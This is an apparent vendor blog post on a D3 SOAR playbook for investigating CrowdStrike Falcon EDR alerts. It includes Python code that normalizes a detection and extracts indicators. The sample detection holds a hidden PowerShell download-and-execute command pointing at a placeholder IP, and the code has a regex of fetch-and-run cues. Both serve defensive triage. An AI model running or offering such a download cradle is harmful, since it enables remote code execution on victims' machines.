As cyber attacks become more sophisticated and frequent, organizations must ensure that they have a robust security system in place. CrowdStrike Falcon and D3 Smart SOAR (Security Orchestration, Automation and Response) are two such systems that work together to provide comprehensive protection against cyber threats. In this blog post, we will break down a playbook for using CrowdStrike Falcon within D3 Smart SOAR to investigate EDR alerts and orchestrate rapid, effective incident response.
D3 integrates with seven CrowdStrike products out of the box:
Unlike other SOARs, D3’s CrowdStrike integration is built, enhanced, and researched by the largest integration team in the industry. Our clients don’t have to write a single line of code or read through hundreds of pages of API documentation to get their integrations to work. Ours come out of the box and free of charge. Here you’ll see it in action.
The alert used in this demo was created because a PowerShell process was used to download and launch a remote file.
Like all events, the raw data is normalized on ingestion. In the event overview we can see the key fields that have been extracted and mapped to D3 system fields. Normalizing data to D3 system fields enables automation and analysis on artifacts using other tools in your environment.
The playbook consists of several stages, including data extraction, API enrichment, automated lookup, documentation and interactive workflows, and email and Slack approval. The first step automatically extracts all relevant data fields from the original CrowdStrike alert and passes them through D3’s vast library of automation commands. The indicators of value to the analyst here are the malicious file, the impacted host, and the process activity that triggered the alert.
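To make the normalization and extraction steps concrete, here is a small added example (not D3 or CrowdStrike code). It takes a constructed detection whose shape loosely follows the Falcon Detects API (a device block plus a list of behaviors; the field names are assumptions for this example), flattens it into a set of system fields through a declarative mapping, and then pulls out the indicators an analyst wants first: host, user, process, file hash, and any URL or IP embedded in the command line. It also flags the download-and-execute pattern described above so the playbook can branch on it.

```python
"""Normalize a constructed EDR detection into flat system fields and extract
the indicators (host, user, process, hash, URL, IP) needed for enrichment."""
import re
from typing import Any

# Constructed sample detection. The structure (device / behaviors) is modelled
# loosely on the Falcon Detects API but every value here is invented.
SAMPLE_DETECTION: dict[str, Any] = {
    "detection_id": "ldt:EXAMPLE0000000000:1234567890",
    "max_severity_displayname": "High",
    "device": {
        "hostname": "WKS-FIN-07",
        "device_id": "aabbccdd00112233",
        "platform_name": "Windows",
    },
    "behaviors": [
        {
            "user_name": "jdoe",
            "filename": "powershell.exe",
            "parent_details": {"parent_cmdline": "explorer.exe"},
            "cmdline": (
                "powershell.exe -nop -w hidden -c \"IEX (New-Object Net.WebClient)"
                ".DownloadString('http://198.51.100.23/update.ps1')\""
            ),
            # Placeholder hash (SHA-256 of the empty string), not a real sample.
            "sha256": "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855",
            "tactic": "Execution",
            "technique": "PowerShell",
        }
    ],
}

# Dotted source path -> normalized system field. Adding a new source format
# means adding a new mapping table, not new parsing code.
FIELD_MAP: dict[str, str] = {
    "detection_id": "detection_id",
    "max_severity_displayname": "severity",
    "device.hostname": "hostname",
    "device.device_id": "host_id",
    "device.platform_name": "platform",
    "behaviors.user_name": "username",
    "behaviors.filename": "process_name",
    "behaviors.cmdline": "command_line",
    "behaviors.parent_details.parent_cmdline": "parent_command_line",
    "behaviors.sha256": "file_sha256",
    "behaviors.tactic": "mitre_tactic",
    "behaviors.technique": "mitre_technique",
}

URL_RE = re.compile(r"https?://[^\s'\"<>()]+")
IPV4_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")
SHA256_RE = re.compile(r"^[0-9a-f]{64}$")
# Cues that a command line fetches remote content and executes it; used as a
# defensive heuristic to route the alert to the malware-download branch.
CRADLE_RE = re.compile(
    r"\b(DownloadString|DownloadFile|Invoke-WebRequest|iwr|IEX|Invoke-Expression)\b",
    re.IGNORECASE,
)


def get_path(obj: Any, path: str) -> Any:
    """Walk a dotted path; when a list is met, descend into its first element
    (the first behavior carries the primary process for this detection)."""
    cur = obj
    for part in path.split("."):
        if isinstance(cur, list):
            cur = cur[0] if cur else None
        if not isinstance(cur, dict):
            return None
        cur = cur.get(part)
    return cur


def normalize(detection: dict[str, Any]) -> dict[str, Any]:
    """Map the raw detection onto system fields, dropping fields it lacks."""
    event = {target: get_path(detection, src) for src, target in FIELD_MAP.items()}
    return {k: v for k, v in event.items() if v is not None}


def extract_indicators(event: dict[str, Any]) -> dict[str, Any]:
    """Pull host, user, process and observables out of a normalized event."""
    cmd = event.get("command_line", "") or ""
    urls = list(dict.fromkeys(URL_RE.findall(cmd)))   # de-duplicate, keep order
    ips = list(dict.fromkeys(IPV4_RE.findall(cmd)))
    hashes = [h for h in [event.get("file_sha256", "")] if SHA256_RE.match(h)]
    return {
        "host": event.get("hostname"),
        "user": event.get("username"),
        "process": event.get("process_name"),
        "parent": event.get("parent_command_line"),
        "hashes": hashes,
        "urls": urls,
        "ips": ips,
        # True only when a fetch-and-run cue appears together with a URL.
        "remote_download_cue": bool(CRADLE_RE.search(cmd)) and bool(urls),
    }


def triage(detection: dict[str, Any]) -> tuple[dict[str, Any], dict[str, Any]]:
    """Normalize, then extract indicators: the first two playbook stages."""
    event = normalize(detection)
    return event, extract_indicators(event)


if __name__ == "__main__":
    normalized, indicators = triage(SAMPLE_DETECTION)
    for k, v in normalized.items():
        print(f"{k:22} {v}")
    print("indicators:", indicators)
```

The indicator dictionary is what the enrichment stage consumes: each hash, URL and IP becomes a lookup against your reputation and threat-intel sources, while the host and user drive the endpoint and identity queries. Keeping the mapping table separate from the walker means a second EDR or SIEM source only needs its own `FIELD_MAP`.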
In the enrichment stage, the playbook analyzes the host, process, IOCs, and user(s) involved in the alert.
This workflow uses six API calls to:
Moving into the response stage of the incident response (IR) lifecycle, D3’s playbook architecture fully supports auto-documentation and scope optimization features. All the details we just went through have been automatically written to the investigation workspace without any action from the analyst. This ensures that any new investigators coming into the incident can immediately grasp the severity and investigation details that have already been documented.
No IR workflow is complete without notifying your team. D3’s built-in email functionality allows you to conveniently fill in the message body with all the critical details from your investigations. In addition, D3 supports interactive messaging via Slack, allowing team members on Slack channels to directly influence the result of the playbook by selecting Approve or Reject. This helps facilitate swift decision-making and enables the team to respond rapidly to threats.
To summarize, the playbook enabled a rapid and effective response to a malware event using automation. We’ve eliminated almost 100% of the data enrichment time needed to get a complete picture of this alert and we’ve confirmed and remediated the event in just a few minutes, ensuring no breaches occurred. With D3 SOAR and CrowdStrike Falcon working together, organizations can rest assured that they have the best possible defense in place.